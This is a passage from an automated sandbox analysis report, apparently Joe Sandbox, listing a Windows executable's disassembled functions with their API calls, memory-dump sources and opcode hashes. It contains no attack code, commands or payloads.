                                                                                                                                                                                                                                                                                      • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                      • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                                      Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                      • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                                      Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                      • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                                      Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                      • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                                      Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                      • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                                      Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                      • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                                      Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                      • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                      • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                                      Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                      • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                                      Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                      • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                                      Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                      • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                      • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                                                                      Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
